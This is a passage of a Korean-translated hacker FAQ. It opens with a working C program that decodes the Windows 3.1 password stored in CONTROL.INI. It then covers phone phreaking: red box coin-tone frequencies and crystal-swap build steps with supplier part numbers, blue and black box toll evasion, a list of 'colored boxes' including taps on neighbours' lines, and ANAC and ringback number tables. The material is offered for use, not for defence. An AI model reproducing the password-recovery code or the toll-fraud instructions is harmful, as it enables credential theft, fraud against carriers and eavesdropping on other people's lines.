내가 말했듯이 숨을 멈추지마라. 역컴파일을 가능하게 하는 기술들이 발전함에 따라서 새로운 최적화기와 언어(C++과 같은)는 그같은 것을 만들기 더 어렵게 할 것이다.

오랫동안 UNIX 응용프로그램은 지저분한 소스 코드 형태로 배포되어(기계나 읽을 수 있지 인간은 이해할 수 없는 - 모든 공백문자와 코맨트를 지우고 변수이름은 OIOI 등으로 바꾸어) 저작권을 보호하려 했다. 역컴파일러의 결과물도 지저분한 소스 코드와 마찬가지로 이해하기 어려울 것이다.

MS-Windows의 패스워드 암호는 어떻게 동작하나?

이 FAQ는 Wayne Hoxie<hoxsiew@crl.com>에 의해서 작성되었다.

MS Win 3.1에서 패스워드 옵션은 쉽게 우회할 수 있다. 그러나, 윈도우에서 어떻게 패스워드를 처리하는지 궁금해 하는 사람들이 있을 것이다. 실제 패스워드를 아는 것이 유용한 많은 이유가 있다. UNIX의 root 패스워드와 윈도우의 패스워드를 동일하게 사용하고 있다고 생각해 보라.

어쨌던, 알게 된 알고리즘을 전달하겠다.

패스워드를 치고 [OK] 버튼을 누르고 난 다음의 과정부터 설명을 한다.

모든 사람이(적어도 흥미를 가지고 있는) XOR 연산이 무엇인지 알고 있다고 가정한다.

먼저, 패스워드의 길이가 저장된다. 이것을 'len'이라고 부르겠다. 입력된 문자열을 암호화하여 다른 문자열로 바꾼다. 먼저 입력된 문자열을 'plain text(평문)'이라고 부르겠다. 그리고 암호화된 문자열(두번의 과정을 거치는데)을 'hash1', 'hash2'라고 부르겠다. 평문의 위치는 이 과정에서 중요한데 이것을 'pos'라고 부르자. 해슁 과정의 각 단계를 거치고나서, 문자는 윈도우가 특별하게'special' 생각하는 문자열과 비교된다. 이 문자들은 '[ ] ='와 ASCII 33 이하나 ASCII 126 이상의 문자이다. 이 검사 연산을 'is_ok'라고 부르겠다. 모든 인텍스는 0을 기준으로 한다.(다시 말해 8개의 문자 패스워드는 0부터 7까지이다.)

이제, '평문'의 첫 번째 문자는 'len'과 xor되어 'is_ok'로 들어간다. 정당한 문자가 아닌 경우, 원래의 '평문'의 문자로 대치되어 다음 연산으로 진행한다. 다음 연산에서 'pos'와 xor 연산을 한다.(이것은 첫 번째 연산에서는 소용없는 것이다 왜냐하면 'len'이 0이고 0과 xor된 것은 그 자신이 되기 때문이다.) 그리고 'is_ok'로 보내고 올바른 것이 아닐 경우 원래의 것으로 대치한다. (문자 당) 마지막 연산은 xor를 앞의 '평문'의 문자와 xor하는 것이다. 이전 문자가 없으므로, 고정된 값 42를 '평문'의 첫 번째 문자에 대해 사용한다. 이것은 'is_ok'로 보내지고 만일 OK라면, 'hash1'의 첫 번째 위치에 저장된다. 이 과정은 평문의 모든 문자에 대해 전부 수행한다. 다음 패스(pass)는 매우 유사하다. 시작점이 hash1의 마지막 문자이다. 그리고 결과는 뒤에서 앞으로 hash2에 들어간다. 또한, 마지막 xor하는 시점에서 이전 문자를 이용하는 대신 현재 문자 다음의 문자가 이용된다. hash1에서 마지막 다음에 나오는 문자가 없으므로, 42값이 마지막 문자대신에 이용된다.

'hash2'는 마지막 문자열이고 윈도우가 CONTROL.INI에 저장하는 값이다.

패스워드를 복호화'decrypt'하기 위해서 위의 과정을 단지 거꾸로 하면 된다.

이제, 기다렸던 것이 왔다. 우리를 위해 어려운 일을 해 줄 C 코드이다.

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

int xor1(int i,int j)

{

int x;

x=i^j;

return (x>126||x<33||x==91||x==93||x==61)?i:x;

}

void main()

{

FILE *f;

int i,l;

char s[80],s1[80];

printf("Please enter the path to your Windows directory\n");

gets(s1);

sprintf(s,"%s%scontrol.ini",s1,s1[strlen(s1)-1]=='\\'?"":"\\");

if((f=fopen(s,"rt"))==NULL){

printf("File Error : %s\n",sys_errlist[errno]);

exit(0);

}

while(strnicmp(fgets(s1,70,f),"password",8)!=0&&!feof(f));

fclose(f);

strtok(s1,"=\n");

strcpy(s,strtok(NULL,"\n"));

i=strlen(s)-1;

for(l=i;l>-1;l--)

s1[l]=xor1(xor1(xor1(s[l],l==i?42:s[l+1]),l==i?0:l),i+1);

for(l=0;l<i+1;l++)

s[l]=xor1(xor1(xor1(s1[l],l?s1[l-1]:42),l?l:0),i+1);

printf("The Password is: %s\n",s);

}




나 절. 전화해킹(Telephony)

적색 기계(Red Box)란 무엇인가?

공중전화에 동전을 넣으면 공중전화는 ACTS(Automated Coin Toll System)에 신호음의 집합을 보낸다. 적색 상자는 ACTS가 동전을 넣었다고 믿게 속인다. 적생 상자는 TCTS 신호음을 ㅁ나들어 전화 송화기에 보낸다. ACTS는 이러한 신호음을 듣고 전화를 할 수 있게 허용한다. 실제 신호음은 다음과 같다.

Nickel Signal 1700+2200hz 0.060s on

Dime Signal 1700+2200hz 0.060s on, 0.060s off, twice repeating

Quarter Signal 1700+2200hz 33ms on, 33ms off, 5 times repeating

카나다는 ACTSD의 변형인 N-ACTS를 이용한다. N-ACTS 는 ACTS와는 다른 음을 사용한다. 카나다에서 신호음은 다음과 같다.

tones than ACTS. In Canada, the tones to use are:

Nickel Signal 2200hz 0.060s on

Dime Signal 2200hz 0.060s on, 0.060s off, twice repeating

Quarter Signal 2200hz 33ms on, 33ms off, 5 times repeating


적색 기계는 어떻게 만드나?

적색 상자는 Radio Shack tone dialer, Hallmark greeting cards, 또는 쉽게 구할 수 있는 전자부

품을 가지고 처음부터 만들 수 있다.

적색 상자를 Shack 43-141또는 43-146 톤 다이얼러로부터 만들려고 한다면 다이얼러를 열고 crystal을 새 것으로 교체한다. 새 것으로 교체하는 목적은 * 버튼이 941Mhz와 1209Mhz 대산1700Mhz와 2200Mhz의 신호음(tone)을 내도록 하기 위해서이다. 교체해야 할 수정진동자의 값은 6.466806을 이용하여 완벽한 1700Mhz의 신호음을 6.513698을 이용하여 완벽한 2200Mhz의 음을 생성할 수 있다. 이 값에 근사한 수정진동자는 ACTS의 오차허용치 내에 들어오는 신호음을 생성할 것이다. 가장 인기좋은 것은 6.5536Mhz의 수정진동자이다. 왜냐하면 이것이 획득하기 가장 쉬운 종류이기 때문이다. 오래된 수정진동자는 크고 빛나는 금속 부품으로 "3.579545Mhz"라고 찍혀있다. 수정진동자의 교체가 끝나면, 다섯 개의 *와 함께 P1 버튼을 프로그램한다. 이것은 P1을 누를 때마다 25센트동전의 신호음을 흉내낸다.


6.5536Mhz의 수정진동자는 어디서 구하나?

전자부품 상접에서 구할 수 있다. Radio Shack에서 판매하고 있다. 그러나, 비싸고 가게에서도 주문을 해야 한다. 2주 정도가 걸린다. 더욱이 많은 Radio Shack 점원들은 이렇게 할 수 있다는 것도 모른다. 또는 수정진동자를 우편으로 주문할 수 있다. 여기에는 수정진동자보다 훨씬 비싼 운송비를 포함하게 된다. 따라서 여러명이 함께 주문해서 운송비를 줄이는 것이 가장 좋다. 아니면 대여섯개를 한꺼번에 산 다음 다른 사람에 팔아도 된다. 주문해서 살 수 있는 곳은 다음과 같다.

Digi-Key

701 Brooks Avenue South

P.O. Box 677

Thief River Falls, MN 56701-0677

(800)344-4539

Part Number:X415-ND /* Note: 6.500Mhz and only .197 x .433 x .149! */

Part Number:X018-ND

JDR Microdevices:

2233 Branham Lane

San Jose, CA 95124

(800)538-5000

Part Number: 6.5536MHZ

Tandy Express Order Marketing

401 NE 38th Street

Fort Worth, TX 76106

(800)241-8742

Part Number: 10068625

Alltronics

2300 Zanker Road

San Jose CA 95131

(408)943-9774 Voice

(408)943-9776 Fax

(408)943-0622 BBS

Part Number: 92A057

Mouser

(800)346-6873

Part Number: 332-1066

Blue Saguaro

P.O. Box 37061

Tucson, AZ 85740

Part Number: 1458b

Unicorn Electronics

10000 Canoga Ave, Unit c-2

Chatsworth, CA 91311

Phone: 1-800-824-3432

Part Number: CR6.5

적색 기계가 동작하는 공중전화는 어떤 것인가?

적색 상자는 teco에서 만든 공중전화에서 작동한다. COCOT(Customer Owned Coin Operated

Telephone)에서는 작동하지 않는다.

적색 상자는 ACTS를 속여서 동적인 공중전화에 넣은 것으로 생각하게 한다. ACTS는 "XX센트을 넣어주세요"라고 발하는 전화회사의 소프트웨어로 동전을 넣는 소리를 확인한다.


적색 기계로 어떻게 시내 전화를 할 수 있나?

공중전화는 시내전화에서 ACTS를 이용하지 않는다. 적색 상자를 시내 전화에 이용하기 위해서 ACTS를 속여서 전화에 끌어들여야 한다. 한가지 방법으로 어떤 진역에서는 10288-xxx-xxxx를 걸면된다. 이렇게하면 통화를 장거리 전화로 하고 ACTS를 끌어들이게 된다.

다른 지역에서는 Directory Assistance를 부르고 전화하려는 사람의 번호를 묻는다. 교환원은 전화번호를 가르쳐주고 "Your call can be completed automatically for an additional 35 cents"라는 말과 유사한 것을 듣게 된다. 이렇게 되면, ACTS 톤을 이용할 수 있게 된다.


청색 기계(Blue Box)란 무엇인가?

청색 기계는 2600Hz의 음을 이용하여 in-band signaling을 이용하는 전화 교환기의 제어를 잡는다. 전화를 건 사람은 특별한 교환 기능에 접근할 수 있다. 청색 상자에서 제공하는 음을 이용하여 대개 장거리 전화를 거는 목적으로 주로 이용된다.

청색 기계는 아직 사용할 수 있나?

LOD의 Marauder에 의해 작성되어 Usenet에 포스팅 된 것을 실은 FAQ이다.

"ESS 때문에 더 이상 청색 박스를 사용할 수 없다"와 같은 인용문을 어디선가 본 것 같다. 이것은 그릇된 생각이다. 내가 코네티컷에 살고 있었을 때, Step by Step, #1AESS, 그리고 DMS-100에서 청생 상자를 이용할 수 있었다. 이유는 간단하다. 내가 다른 교환기(Class 5 office, aka Central Office)에서 800번 서비스로 전화를 걸었을 때라도 800 통화가 과금 네트워크로 절달되면 그것은 New Haven #5 Crossbar toll Tandem Office를 통해서 가게 된다. 클라스 5(CO)와 클라스 4(과금 사무실, 이 경우에는 New Haven #5 Xbar) 사이 트렁크에서 신호를 보낼 때 일어난다. 그래서 어떤 번호로 걸든, 그것이 Inter-Lata 통화을 경우, 자신의 통화(call)은 이 특정 트렁크 집합을 통과하게 된다. 그리고 청색 상자를 이용할 수 있다. 발신 중앙 사무실 교환기(SXS/ESS 등)은 박스를 이용하는데 별 영향을 미치지 않는다. ESS(와 다른 전자 교환기)의 출현이 청색 상자를 이용하는 것이 좀 더 어렵게 만들었지만, ESS는 청색상자를 사용할 수 없는 이유는 못된다.

주요 원인은 CCIS의 "진행 음향 소거"기능이다. (out of band signalling). 불운하게도 Toll

Completion Center의 99%의 청색상자 이용자는 CCIS 링크를 이용하고 있다. 이것은 청색 상자을 이용하는 사람에게는 재안이다. 왜냐하면, 대부분의 MF signalling을 이용하는 트렁크를 찾기 위해 지역으로부터 전화를 지역 밖으로 걸 때, CCIS가 장치된 네트워크의 부분을 어쩔 수 없이 지나야 되기 때문에 2600hz를 보낼 교환기를 찾아서 "winkstart" 신호를 받고나서 MF 신호를 보내더라도 재명령 신호만을 받게 된다. 이것은 트렁크를 잡자마자(2600hz를 이용하여), Originating

Toll Office가 목적지에서의 통제를 잃은 것으로 본다(다시 말해서 트렁크를 기다리는 것). 재명령을 받게 되는 것은 기다리고 잇는 트렁크가 MF 톤을 듣기 못하기 때문이다. 이것은 곧 타임아웃에 걸리게 된다. 따라서 어떻게해서든 MF 신호를 이용하지만 CCISS audio mute 문제를 피하게이나 정지시킨 곳을 찾아야 한다. (힌트: WATS 확장기를 잘 살펴본다.)

흑색 기계는 무엇인가?

흑색 상자는 저항(또는 병렬로 연결된 컨덴서)로 전화를 받았는지 전화 회사의 장비가 알 수 없도록 전화선에 설치하는 것이다. 흑색 상자가 있는 전화에 전화를 건 사람은 전화비를 지불하지 않게 된다. 흑색 상자는 ESS에서 작동하지 않는다.

유색 기계(colored box)는 모두 무슨 기능이 있나?

Acrylic Steal Three-Way-Calling, Call Waiting and programmable

Call Forwarding on old 4-wire phone systems

Aqua Drain the voltage of the FBI lock-in-trace/trap-trace

Beige Lineman's hand set

Black Allows the calling party to not be billed for the call

placed

Blast Phone microphone amplifier

Blotto Supposedly shorts every phone out in the immediate area

Blue Emulate a true operator by seizing a trunk with a 2600hz

tone

Brown Create a party line from 2 phone lines

Bud Tap into your neighbors phone line

Chartreuse Use the electricity from your phone line

Cheese Connect two phones to create a diverter

Chrome Manipulate Traffic Signals by Remote Control

Clear A telephone pickup coil and a small amp used to make free

calls on Fortress Phones

Color Line activated telephone recorder

Copper Cause crosstalk interference on an extender

Crimson Hold button

Dark Re-route outgoing or incoming calls to another phone

Dayglo Connect to your neighbors phone line

Diverter Re-route outgoing or incoming calls to another phone

DLOC Create a party line from 2 phone lines

Gold Dialout router

Green Emulate the Coin Collect, Coin Return, and Ringback tones

Infinity Remotely activated phone tap

Jack Touch-Tone key pad

Light In-use light

Lunch AM transmitter

Magenta Connect a remote phone line to another remote phone line

Mauve Phone tap without cutting into a line

Neon External microphone

Noise Create line noise

Olive External ringer

Party Create a party line from 2 phone lines

Pearl Tone generator

Pink Create a party line from 2 phone lines

Purple Telephone hold button

Rainbow Kill a trace by putting 120v into the phone line (joke)

Razz Tap into your neighbors phone

Red Make free phone calls from pay phones by generating

quarter tones

Rock Add music to your phone line

Scarlet Cause a neighbors phone line to have poor reception

Silver Create the DTMF tones for A, B, C and D

Static Keep the voltage on a phone line high

Switch Add hold, indicator lights, conferencing, etc..

Tan Line activated telephone recorder

Tron Reverse the phase of power to your house, causing your

electric meter to run slower

TV Cable "See" sound waves on your TV

Urine Create a capacitative disturbance between the ring and

tip wires in another's telephone headset

Violet Keep a payphone from hanging up

White Portable DTMF keypad

Yellow Add an extension phone

박스 개념도는 다음 FTP 사이트에서 얻을 수 있다.

ftp.netcom.com /pub/br/bradleym

ftp.netcom.com /pub/va/vandal

ftp.winternet.com /users/nitehwk


ANAC 번호란 무엇인가?

ANAC (Automatic Number Announcecement Circuit) 번호는 전화번호로서, 전화를 건 전화의

번호를 다시 들려주는 것이다. ANAC 번호는 한 쌍의 전화선의 전화번호를 알고 싶을 경우에 편리하다.

내가 있는 지역의 ANAC 번호는?

ANAC 번호 찾는 법:

NPA(Area Code)를 찾는다. 그리고 그곳에 나타난 번호를 시도해 본다. 실패하면, 나타나 있는 번

호에 1을 더해서 시도해 본다. 그것도 실패하면, 311, 958그리고 200-222-2222와 같은 일반적인 번호를 시도해 본다. 그 지역의 ANAC 번호를 찾을 경우 통보해 주었으면 좋겠다.

같은 도시 내에서도 교환기에 따라서 ANAC 번호가 다양하다. 찾고 있는 전화번호를 알기 위해서 메뉴를 따라 뒤져야 한다. 800 ANAC 번호를 남용할 경우 그 번호가 사라질 염려가 있으므로 되도록 지역 ANAC 번호를 이용하기 바란다.

N (800)425-6256 VRS Billing Systems/Integretel (800)4BLOCKME

(800)568-3197 Info Access Telephone Company's Automated Blocking Line

(800)692-6447 (800)MY-ANI-IS (Now protected by a passcode!)

N (800)858-9857 AT&T True Rewards

800번이 아닌 전지역 ANAC 번호는 404-988-9664이다. AT&T Carrier Access Code 10732로 전

화를 걸어야 한다. 이 번호를 사용할 경우, 요금이 부과되지 않는 것으로 보인다.

주의 : 이것은 참고를 위한 것이다. ANAC 번호는 같은 도시 내에서도 교환기에 따라 달라진다.

NPA ANAC number Approximate Geographic area

--- --------------- ---------------------------------------------

201 958 Hackensack/Jersey City/Newark/Paterson, NJ

202 811 District of Columbia

203 970 CT

205 300-222-2222 Birmingham, AL

205 300-555-5555 Many small towns in AL

205 300-648-1111 Dora, AL

205 300-765-4321 Bessemer, AL

205 300-798-1111 Forestdale, AL

205 300-833-3333 Birmingham

205 557-2311 Birmingham, AL

205 811 Pell City/Cropwell/Lincoln, AL

205 841-1111 Tarrant, AL

205 908-222-2222 Birmingham, AL

206 411 WA (Not US West)

207 958 ME

209 830-2121 Stockton, CA

209 211-9779 Stockton, CA

210 830 Brownsville/Laredo/San Antonio, TX

N 210 951 Brownsville/Laredo/San Antonio, TX (GTE)

212 958 Manhattan, NY

213 114 Los Angeles, CA (GTE)

213 1223 Los Angeles, CA (Some 1AESS switches)

213 211-2345 Los Angeles, CA (English response)

213 211-2346 Los Angeles, CA (DTMF response)

213 760-2??? Los Angeles, CA (DMS switches)

213 61056 Los Angeles, CA

214 570 Dallas, TX

214 790 Dallas, TX (GTE)

214 970-222-2222 Dallas, TX

214 970-611-1111 Dallas, TX (Southwestern Bell)

215 410-xxxx Philadelphia, PA

215 511 Philadelphia, PA

215 958 Philadelphia, PA

216 200-XXXX Akron/Canton/Cleveland/Lorain/Youngstown, OH

216 331 Akron/Canton/Cleveland/Lorain/Youngstown, OH

216 959-9892 Akron/Canton/Cleveland/Lorain/Youngstown, OH

217 200-xxx-xxxx Champaign-Urbana/Springfield, IL

219 550 Gary/Hammond/Michigan City/Southbend, IN

219 559 Gary/Hammond/Michigan City/Southbend, IN

N 301 2002006969 Hagerstown/Rockville, MD

301 958-9968 Hagerstown/Rockville, MD

303 958 Aspen/Boulder/Denver/Durango/Grand Junction

/Steamboat Springs, CO

N 305 200-555-1212 Ft. Lauderdale/Key West/Miami, FL

N 305 200200200200200 Ft. Lauderdale/Key West/Miami, FL

N 305 780-2411 Ft. Lauderdale/Key West/Miami, FL

310 114 Long Beach, CA (On many GTE switches)

310 1223 Long Beach, CA (Some 1AESS switches)

310 211-2345 Long Beach, CA (English response)

310 211-2346 Long Beach, CA (DTMF response)

312 200 Chicago, IL

312 290 Chicago, IL

312 1-200-8825 Chicago, IL (Last four change rapidly)

312 1-200-555-1212 Chicago, IL

313 200-200-2002 Ann Arbor/Dearborn/Detroit, MI

313 200-222-2222 Ann Arbor/Dearborn/Detroit, MI

313 200-xxx-xxxx Ann Arbor/Dearborn/Detroit, MI

313 200200200200200 Ann Arbor/Dearborn/Detroit, MI

314 410-xxxx# Columbia/Jefferson City/St.Louis, MO

315 953 Syracuse/Utica, NY

315 958 Syracuse/Utica, NY

315 998 Syracuse/Utica, NY

317 310-222-2222 Indianapolis/Kokomo, IN

317 559-222-2222 Indianapolis/Kokomo, IN

317 743-1218 Indianapolis/Kokomo, IN

334 5572411 Montgomery, AL

334 5572311 Montgomery, AL

401 200-200-4444 RI

401 222-2222 RI

402 311 Lincoln, NE

404 311 Atlanta, GA

N 770 780-2311 Atlanta, GA

404 940-xxx-xxxx Atlanta, GA

404 990 Atlanta, GA

405 890-7777777 Enid/Oklahoma City, OK

405 897 Enid/Oklahoma City, OK

U 407 200-222-2222 Orlando/West Palm Beach, FL (Bell South)

N 407 520-3111 Orlando/West Palm Beach, FL (United)

408 300-xxx-xxxx San Jose, CA

408 760 San Jose, CA

408 940 San Jose, CA

409 951 Beaumont/Galveston, TX

409 970-xxxx Beaumont/Galveston, TX

410 200-6969 Annapolis/Baltimore, MD

N 410 200-200-6969 Annapolis/Baltimore, MD

410 200-555-1212 Annapolis/Baltimore, MD

410 811 Annapolis/Baltimore, MD

412 711-6633 Pittsburgh, PA

412 711-4411 Pittsburgh, PA

412 999-xxxx Pittsburgh, PA

413 958 Pittsfield/Springfield, MA

413 200-555-5555 Pittsfield/Springfield, MA

414 330-2234 Fond du Lac/Green Bay/Milwaukee/Racine, WI

415 200-555-1212 San Francisco, CA

415 211-2111 San Francisco, CA

415 2222 San Francisco, CA

415 640 San Francisco, CA

415 760-2878 San Francisco, CA

415 7600-2222 San Francisco, CA

419 311 Toledo, OH

N 423 200-200-200 Chatanooga, Johnson City, Knoxville , TN

N 501 511 AR

502 2002222222 Frankfort/Louisville/Paducah/Shelbyville, KY

502 997-555-1212 Frankfort/Louisville/Paducah/Shelbyville, KY

503 611 Portland, OR

503 999 Portland, OR (GTE)

504 99882233 Baton Rouge/New Orleans, LA

504 201-269-1111 Baton Rouge/New Orleans, LA

504 998 Baton Rouge/New Orleans, LA

504 99851-0000000000 Baton Rouge/New Orleans, LA

508 958 Fall River/New Bedford/Worchester, MA

508 200-222-1234 Fall River/New Bedford/Worchester, A

508 200-222-2222 Fall River/New Bedford/Worchester, A

508 26011 Fall River/New Bedford/Worchester, MA

509 560 Spokane/Walla Walla/Yakima, WA

510 760-1111 Oakland, CA

512 830 Austin/Corpus Christi, TX

512 970-xxxx Austin/Corpus Christi, TX

N 513 380-55555555 Cincinnati/Dayton, OH

515 5463 Des Moines, IA

515 811 Des Moines, IA

516 958 Hempstead/Long Island, NY

516 968 Hempstead/Long Island, NY

517 200-222-2222 Bay City/Jackson/Lansing, MI

517 200200200200200 Bay City/Jackson/Lansing, MI

518 511 Albany/Schenectady/Troy, NY

518 997 Albany/Schenectady/Troy, NY

518 998 Albany/Schenectady/Troy, NY

N 540 211 Roanoke, VA (GTE)

N 540 311 Roanoke, VA (GTE)

N 541 200 Bend, OR

603 200-222-2222 NH

606 997-555-1212 Ashland/Winchester, KY

606 711 Ashland/Winchester, KY

607 993 Binghamton/Elmira, NY

609 958 Atlantic City/Camden/Trenton/Vineland, NJ

610 958 Allentown/Reading, PA

610 958-4100 Allentown/Reading, PA

612 511 Minneapolis/St.Paul, MN

614 200 Columbus/Steubenville, OH

614 571 Columbus/Steubenville, OH

615 200200200200200 Chatanooga/Knoxville/Nashville, TN

615 2002222222 Chatanooga/Knoxville/Nashville, TN

615 830 Nashville, TN

616 200-222-2222 Battle Creek/Grand Rapids/Kalamazoo, I

617 200-222-1234 Boston, MA

617 200-222-2222 Boston, MA

617 200-444-4444 Boston, MA (Woburn, MA)

617 220-2622 Boston, MA

617 958 Boston, MA

618 200-xxx-xxxx Alton/Cairo/Mt.Vernon, IL

618 930 Alton/Cairo/Mt.Vernon, IL

619 211-2001 San Diego, CA

619 211-2121 San Diego, CA

N 659 220-2622 Newmarket, NH

N 703 211 VA

N 703 511-3636 Culpeper/Orange/Fredericksburg, VA

703 811 Alexandria/Arlington/Roanoke, VA

704 311 Asheville/Charlotte, NC

N 706 940-xxxx Augusta, GA

707 211-2222 Eureka, CA

708 1-200-555-1212 Chicago/Elgin, IL

708 1-200-8825 Chicago/Elgin, IL (Last four change rapidly)

708 200-6153 Chicago/Elgin, IL

708 724-9951 Chicago/Elgin, IL

713 380 Houston, TX

713 970-xxxx Houston, TX

713 811 Humble, TX

N 713 380-5555-5555 Houston, TX

714 114 Anaheim, CA (GTE)

714 211-2121 Anaheim, CA (PacBell)

714 211-2222 Anaheim, CA (Pacbell)

N 714 211-7777 Anaheim, CA (Pacbell)

716 511 Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)

716 990 Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)

717 958 Harrisburg/Scranton/Wilkes-Barre, PA

718 958 Bronx/Brooklyn/Queens/Staten Island, NY

N 770 940-xxx-xxxx Marietta/Norcross, GA

N 770 780-2311 Marietta/Norcross, GA

802 2-222-222-2222 Vermont

802 200-222-2222 Vermont

802 1-700-222-2222 Vermont

802 111-2222 Vermont

N 804 990 Virginia Beach, VA

805 114 Bakersfield/Santa Barbara, CA

805 211-2345 Bakersfield/Santa Barbara, CA

805 211-2346 Bakersfield/Santa Barbara, CA (Returns DTMF)

805 830 Bakersfield/Santa Barbara, CA

806 970-xxxx Amarillo/Lubbock, TX

810 200200200200200 Flint/Pontiac/Southfield/Troy, I

N 810 311 Pontiac/Southfield/Troy, MI

812 410-555-1212 Evansville, IN

813 311 Ft. Meyers/St. Petersburg/Tampa, FL

N 815 200-3374 Crystal Lake, IL

N 815 270-3374 Crystal Lake, IL

N 815 770-3374 Crystal Lake, IL

815 200-xxx-xxxx La Salle/Rockford, IL

815 290 La Salle/Rockford, IL

817 211 Ft. Worth/Waco, TX

817 970-611-1111 Ft. Worth/Waco, TX (Southwestern Bell)

818 1223 Pasadena, CA (Some 1AESS switches)

818 211-2345 Pasadena, CA (English response)

818 211-2346 Pasadena, CA (DTMF response)

N 860 970 CT

903 970-611-1111 Tyler, TX

904 200-222-222 Jackonsville/Pensacola/Tallahasee, FL

906 1-200-222-2222 Marquette/Sault Ste. Marie, MI

907 811 AK

908 958 New Brunswick, NJ

N 909 111 Riverside/San Bernardino, CA (GTE)

910 200 Fayetteville/Greensboro/Raleigh/Winston-Salem, NC

910 311 Fayetteville/Greensboro/Raleigh/Winston-Salem, NC

910 988 Fayetteville/Greensboro/Raleigh/Winston-Salem, NC

914 990-1111 Peekskill/Poughkeepsie/White Plains/Yonkers, NY

915 970-xxxx Abilene/El Paso, TX

N 916 211-0007 Sacramento, CA (Pac Bell)

916 461 Sacramento, CA (Roseville Telephone)

919 200 Durham, NC

919 711 Durham, NC

N 954 200-555-1212 Ft. Lauderdale, FL

N 954 200200200200200 Ft. Lauderdale, FL

N 954 780-2411 Ft. Lauderdale, FL

Canada:

204 644-4444 Manitoba

306 115 Saskatchewan

403 311 Alberta, Yukon and N.W. Territory

403 908-222-2222 Alberta, Yukon and N.W. Territory

403 999 Alberta, Yukon and N.W. Territory

416 997-xxxx Toronto, Ontario

506 1-555-1313 New Brunswick

514 320-xxxx Montreal, Quebec

U 514 320-1232 Montreal, Quebec

U 514 320-1223 Montreal, Quebec

U 514 320-1233 Montreal, Quebec

519 320-xxxx London, Ontario

604 1116 British Columbia

604 1211 British Columbia

604 211 British Columbia

613 320-2232 Ottawa, Ontario

705 320-4567 North Bay/Saulte Ste. Marie, Ontario

N 819 320-1112 Quebec

Australia:

+61 03-552-4111 Victoria 03 area

+612 19123 All major capital cities

+612 11544

United Kingdom:

175

Israel:

110

재신호(ringback) 번호란 무엇인가?

재신호 번호란 전화가 걸려왔던 곳으로 즉시 다시 전화를 거는 번호이다.

대부분의 경우, 재신호 번호에 전화를 걸고



내가 있는 지역의 재신호 번호는?

'x'는 전화를 걸고 있는 곳의 전화 번호를 대신 넣어야 할 곳이다. '?'는 지역에 있는 교환기마다

달라지거나 시간에 따라 달라지는 번호를 말한다. 가능한 모든 조합을 시도해 보기 바란다.

NPA에 대한 재신호 번호가 없다면, 114, 951-xxx-xxxx, 954, 957 그리고 958을 시도해보라.

그리고, 전화 회사에서 제공하는 다른 NPA 번호도 시도해 보라.

주의: 이 지리적 지역은 참고의 목적만을 위한 것이다. 재신호번호는 같은 도시 내에서도 교환기

마다 다를 수 있다.

NPA Ringback number Approximate Geographic area

--- --------------- ---------------------------------------------

201 55?-xxxx Hackensack/Jersey City/Newark/Paterson, NJ

202 958-xxxx District of Columbia

203 99?-xxxx CT

206 571-xxxx WA

N 208 59X-xxxx ID

208 99xxx-xxxx ID

N 210 211-8849-xxxx Brownsville/Laredo/San Antonio, TX (GTE)

213 1-95x-xxxx Los Angeles, CA

N 214 971-xxxx Dallas, TX

215 811-xxxx Philadelphia, PA

216 551-xxxx Akron/Canton/Cleveland/Lorain/Youngstown, OH

219 571-xxx-xxxx Gary/Hammond/Michigan City/Southbend, IN

219 777-xxx-xxxx Gary/Hammond/Michigan City/Southbend, IN

301 579-xxxx Hagerstown/Rockville, MD

301 958-xxxx Hagerstown/Rockville, MD

303 99X-xxxx Grand Junction, CO

304 998-xxxx WV

305 999-xxxx Ft. Lauderdale/Key West/Miami, FL

312 511-xxxx Chicago, IL

312 511-xxx-xxxx Chicago, IL

312 57?-xxxx Chicago, IL

315 98x-xxxx Syracuse/Utica, NY

317 777-xxxx Indianapolis/Kokomo, IN

317 yyy-xxxx Indianapolis/Kokomo, IN (y=3rd digit of phone number)

319 79x-xxxx Davenport/Dubuque, Iowa

334 901-xxxx Montgomery, AL

401 98?-xxxx RI

404 450-xxxx Atlanta, GA

407 988-xxxx Orlando/West Palm Beach, FL

408 470-xxxx San Jose, CA

408 580-xxxx San Jose, CA

412 985-xxxx Pittsburgh, PA

414 977-xxxx Fond du Lac/Green Bay/Milwaukee/Racine, WI

414 978-xxxx Fond du Lac/Green Bay/Milwaukee/Racine, WI

415 350-xxxx San Francisco, CA

417 551-xxxx Joplin/Springfield, MO

501 221-xxx-xxxx AR

501 721-xxx-xxxx AR

502 988 Frankfort/Louisville/Paducah/Shelbyville, KY

503 541-XXXX OR

504 99x-xxxx Baton Rouge/New Orleans, LA

504 9988776655 Baton Rouge/New Orleans, LA

505 59?-xxxx New Mexico

512 95X-xxxx Austin, TX

513 951-xxxx Cincinnati/Dayton, OH

513 955-xxxx Cincinnati/Dayton, OH

513 99?-xxxx Cincinnati/Dayton, OH (X=0, 1, 2, 3, 4, 8 or 9)

N 515 559-XXXX Des Moines, IA

516 660-xxx-xxxx Hempstead/Long Island, NY

601 777-xxxx MS

609 55?-xxxx Atlantic City/Camden/Trenton/Vineland, NJ

610 811-xxxx Allentown/Reading, PA

612 511 Minneapolis/St.Paul, MN

612 999-xxx-xxxx Minneapolis/St.Paul, MN

N 613 999-xxx-xxxx Ottawa, Ontario

614 998-xxxx Columbus/Steubenville, OH

615 920-XXXX Chatanooga/Knoxville/Nashville, TN

615 930-xxxx Chatanooga/Knoxville/Nashville, TN

616 946-xxxx Battle Creek/Grand Rapids/Kalamazoo, I

619 331-xxxx San Diego, CA

619 332-xxxx San Diego, CA

N 659 981-XXXX Newmarket, NH

N 703 511-xxx-xxxx VA

703 958-xxxx Alexandria/Arlington/Roanoke, VA

708 511-xxxx Chicago/Elgin, IL

N 713 231-xxxx Los Angeles, CA

714 330? Anaheim, CA (GTE)

714 33?-xxxx Anaheim, CA (PacBell)

716 981-xxxx Rochester, NY (Rochester Tel)

718 660-xxxx Bronx/Brooklyn/Queens/Staten Island, NY

719 99x-xxxx Colorado Springs/Leadville/Pueblo, CO

801 938-xxxx Utah

801 939-xxxx Utah

802 987-xxxx Vermont

804 260 Charlottesville/Newport News/Norfolk/Richmond, VA

805 114 Bakersfield/Santa Barbara, CA

805 980-xxxx Bakersfield/Santa Barbara, CA

810 951-xxx-xxxx Pontiac/Southfield/Troy, MI

813 711 Ft. Meyers/St. Petersburg/Tampa, FL

817 971 Ft. Worth/Waco, TX (Flashhook, then 2#)

906 951-xxx-xxxx Marquette/Sault Ste. Marie, MI

908 55?-xxxx New Brunswick, NJ

